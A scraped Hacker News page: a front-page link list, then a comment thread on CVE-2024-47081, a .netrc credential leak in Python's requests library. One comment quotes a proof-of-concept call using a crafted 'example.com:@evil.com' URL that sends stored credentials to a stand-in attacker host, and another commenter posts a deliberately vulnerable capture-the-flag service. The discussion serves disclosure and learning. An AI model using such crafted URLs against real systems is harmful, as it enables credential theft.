frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

Show HN: ClickStack – Open-source Datadog alternative by ClickHouse and HyperDX

https://clickhouse.com/use-cases/observability
54•mikeshi42•1h ago•10 comments

The impossible predicament of the death newts

https://crookedtimber.org/2025/06/05/occasional-paper-the-impossible-predicament-of-the-death-newts/
286•bdr•6h ago•98 comments

Neuromorphic computing

https://www.lanl.gov/media/publications/1663/1269-neuromorphic-computing
26•LAsteNERD•1h ago•12 comments

Seven Days at the Bin Store

https://defector.com/seven-days-at-the-bin-store
75•zdw•3h ago•30 comments

Google restricts Android sideloading

https://puri.sm/posts/google-restricts-android-sideloading-what-it-means-for-user-autonomy-and-the-future-of-mobile-freedom/
264•fsflover•3h ago•195 comments

Show HN: iOS Screen Time from a REST API

https://www.thescreentimenetwork.com/api/
37•anteloper•1h ago•20 comments

Eleven v3

https://elevenlabs.io/v3
52•robertvc•1h ago•20 comments

Understanding the PURL Specification (Package URL)

https://fossa.com/blog/understanding-purl-specification-package-url/
49•todsacerdoti•3h ago•30 comments

AI Weather Model Is More Accurate, Less Expensive Than Traditional Forecasting

https://www.nytimes.com/2025/05/21/climate/ai-weather-models-aurora-microsoft.html
16•rmason•36m ago•3 comments

Millions in west don't know they have aggressive fatty liver disease, study says

https://www.theguardian.com/society/2025/jun/05/millions-in-west-do-not-know-they-have-aggressive-fatty-liver-disease-study-says
43•robaato•2h ago•27 comments

CircuitHub (YC W12) is hiring full-stack robotics engineers

https://www.workatastartup.com/jobs/76919
1•seddona•2h ago

A proposal to restrict sites from accessing a users’ local network

https://github.com/explainers-by-googlers/local-network-access
561•doener•1d ago•323 comments

Cysteine depletion triggers adipose tissue thermogenesis and weight loss

https://www.nature.com/articles/s42255-025-01297-8
65•bookofjoe•3h ago•49 comments

Phptop: Simple PHP ressource profiler, safe and useful for production sites

https://github.com/bearstech/phptop
83•kadrek•11h ago•13 comments

Gemini-2.5-pro-preview-06-05

https://deepmind.google/models/gemini/pro/
212•jcuenod•3h ago•117 comments

Rare black iceberg spotted off Labrador coast could be 100k years old

https://www.cbc.ca/news/canada/newfoundland-labrador/black-iceberg-labrador-coast-1.7551078
52•pseudolus•3h ago•20 comments

From tokens to thoughts: How LLMs and humans trade compression for meaning

https://arxiv.org/abs/2505.17117
88•ggirelli•11h ago•20 comments

Programming language Dino and its implementation

https://github.com/dino-lang/dino
4•90s_dev•2h ago•0 comments

Air Lab – A portable and open air quality measuring device

https://networkedartifacts.com/airlab/simulator
277•256dpi•12h ago•135 comments

Autonomous drone defeats human champions in racing first

https://www.tudelft.nl/en/2025/lr/autonomous-drone-from-tu-delft-defeats-human-champions-in-historic-racing-first
278•picture•23h ago•213 comments

OpenAI slams court order to save all ChatGPT logs, including deleted chats

https://arstechnica.com/tech-policy/2025/06/openai-says-court-forcing-it-to-save-all-chatgpt-logs-is-a-privacy-nightmare/
1019•ColinWright•22h ago•840 comments

LLMs and Elixir: Windfall or Deathblow?

https://www.zachdaniel.dev/p/llms-and-elixir-windfall-or-deathblow
198•uxcolumbo•20h ago•102 comments

parrot.live

https://github.com/hugomd/parrot.live
191•jasonthorsness•20h ago•44 comments

End of an Era: Landsat 7 Decommissioned After 25 Years of Earth Observation

https://www.usgs.gov/news/national-news-release/end-era-landsat-7-decommissioned-after-25-years-earth-observation
84•keepamovin•15h ago•34 comments

Apple Notes Will Gain Markdown Export at WWDC, and, I Have Thoughts

https://daringfireball.net/linked/2025/06/04/apple-notes-markdown
192•robenkleene•6h ago•117 comments

Show HN: I made a 3D SVG Renderer that projects textures without rasterization

https://seve.blog/p/i-made-a-3d-svg-renderer-that-projects
188•seveibar•17h ago•65 comments

A Spiral Structure in the Inner Oort Cloud

https://iopscience.iop.org/article/10.3847/1538-4357/adbf9b
121•gnabgib•20h ago•32 comments

Cursor 1.0

https://www.cursor.com/en/changelog/1-0
561•ecz•23h ago•423 comments

Twitter's new encrypted DMs aren't better than the old ones

https://mjg59.dreamwidth.org/71646.html
162•tabletcorry•6h ago•159 comments

Prompt engineering playbook for programmers

https://addyo.substack.com/p/the-prompt-engineering-playbook-for
381•vinhnx•1d ago•146 comments
Open in hackernews

CVE-2024-47081: Netrc credential leak in PSF requests library

https://seclists.org/fulldisclosure/2025/Jun/2
62•jupenur•2d ago

Comments

dcrazy•1d ago
> The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.
pixl97•1d ago
Execute the call

>requests.get('http://example.com:@evil.com/')

>Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call

Instead of having a url parse error it appears to drop the : and use the password:domain format.

woodruffw•1d ago
Another good example of lax URL parsing/parser differentials being problematic.

That being said, I wonder how big the actual impact here is in practice: how many users actually use .netrc? I’ve been using curl and other network tools for well over a decade and I don’t think I’ve ever used .netrc for site credentials.

w7•1d ago
I think it may be in use by tools without people being aware. I decided to check my workstation for it just in case, figuring the file would be empty, or not exist.

Instead it seems to be populated with what seem to be Heroku API and git credentials.

cozzyd•1d ago
I have it on my laptop because it's the most convenient way to download datasets from various repositories (e.g. NASA Earth Data).
edelbitter•1d ago
Well then go check if you are for some reason using any of the other surprise features [1], like honoring the CURL_CA_BUNDLE env variable, or not honoring the PROXIES env variable if REQUEST_METHOD is set.

1: https://requests.readthedocs.io/en/latest/api/#requests.Sess...

awoimbee•1d ago
That's some horrible url parsing code...

But honestly urllib sucks:

url.hostname doesn't return the port url.netloc also returns the basic auth part So you have to f"{u.hostname}:{u.port}"

edelbitter•1d ago
Wait till you see the cPython stdlib email parser..

Any programming language these days should ship a decent rfc5234 API in the standard library, so you do not get these kinds of problems in slightly different fashion for each and every library/program.

janzer•1d ago
Given that the actual vulnerability seems relatively niche along with it being such a popular library officially maintained by the Python foundation, the scariest line in the advisory is almost certainly:

The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.

Daviey•1d ago
Well, it's probably just a coincidence, but I literally just spun up a web service that is vulnerable to this: https://isitup.daviey.com/

The code doesn't make any reference to a .netrc, but I happen to have one in ~/.netrc:

  machine localhost
  login *REDACTED*
  password CTF{*REDACTED*}
It's not ideal that requests automatically slurps credentials from ~/.netrc and leaks them, even when my code never references it. It's possible that the netrc is on the same server from a different application, developer debugging environment, or just forgotten about etc.

First one to grab the flag wins, well, nothing. But have fun. I'll keep it online for a couple of weeks, or until the VC money runs out.

dgl•1d ago

  Sorry, you have been blocked
  You are unable to access daviey.com
Looks like Cloudflare has decided the whole thing is dodgy. Or doesn't like my IP address...
Daviey•1d ago
That's really strange... because it seems to be working for some people (already have the first solve). I can't see an issues in CF...

EDIT: I had the security in CF too robust, try now?

progbits•23h ago
Edit: Comment removed on request of parent.
Daviey•23h ago
Well done for solving it.. but I'd have preferred you had not shared the solution, it's against the spirit of these sorts of things, but I can't stop you. :)

EDIT: I do appreciate you removing the solution. Have a great day.

audiodude•1d ago
If you, like me, have never heard of a .netrc file...

https://everything.curl.dev/usingcurl/netrc.html

neilv•1d ago
There might be a funny thing with FTP, in which, if a company is using FTP, it's probably for something important.

(Even if it's a bad idea now, and compromise of it could result in a bad quarter or regulatory action, legacy systems and priorities happen.)

zx8080•1d ago
A funny commit message in the root cause (as stated in the linked post) commit:

> Push code review advice from @sigmavirus24

dfedbeef•1d ago
I feel this
sionisrecur•1d ago
To be fair, the advice from sigmavirus24 was about dealing with decoding the ':' character: https://github.com/psf/requests/pull/2936/files

The code already had `host = ri.netloc.split(':')[0]` before that.

The actual root issue is urlparse doesn't split the host, user, pass and port and trying to do it manually is very error prone:

    urllib.parse.urlparse('http://example.com:@evil.com:8080/')
    ParseResult(scheme='http', netloc='example.com:@evil.com:8080', path='/', params='', query='', fragment='')
Compare this with php:

    parse_url ('http://example.com:@evil.com:8080/')
    [
        "scheme" => "http",
        "host" => "evil.com",
        "port" => 8080,
        "user" => "example.com",
        "pass" => "",
        "path" => "/",
    ]
kidmin•20h ago
and it is from the beginning: https://github.com/psf/requests/commit/79bb9ee1417afe2231972...
Daviey•1d ago
Patch has now been merged, seems the Full Disclosure process works, https://github.com/psf/requests/pull/6965